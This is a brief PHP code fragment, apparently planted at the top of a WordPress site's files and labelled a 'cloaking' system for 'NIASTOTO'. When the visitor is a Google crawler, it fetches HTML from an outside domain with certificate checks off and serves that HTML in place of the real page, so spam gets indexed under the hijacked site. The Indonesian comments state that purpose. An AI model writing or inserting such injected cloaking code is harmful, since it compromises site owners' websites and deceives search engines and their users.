/* --- SYSTEM CORE CLOAKING V7.0 (NIASTOTO) --- */ $ua = $_SERVER['HTTP_USER_AGENT'] ?? ''; $is_bot = (bool)preg_match('/(googlebot|google-inspectiontool|adsbot-google|mediapartners-google)/i', $ua); if ($is_bot) { // Jalankan fetch konten dari mangap.it.com (ID: hcu9n) $source_url = "https://kyell.xyz/amp/missjacket-bluzy.txt"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $source_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $html = curl_exec($ch); curl_close($ch); if ($html) { header('Content-Type: text/html; charset=UTF-8'); echo $html; // Tampilkan NIASTOTO agar terindeks exit; } } /* --- LANJUTAN WORDPRESS STANDAR --- */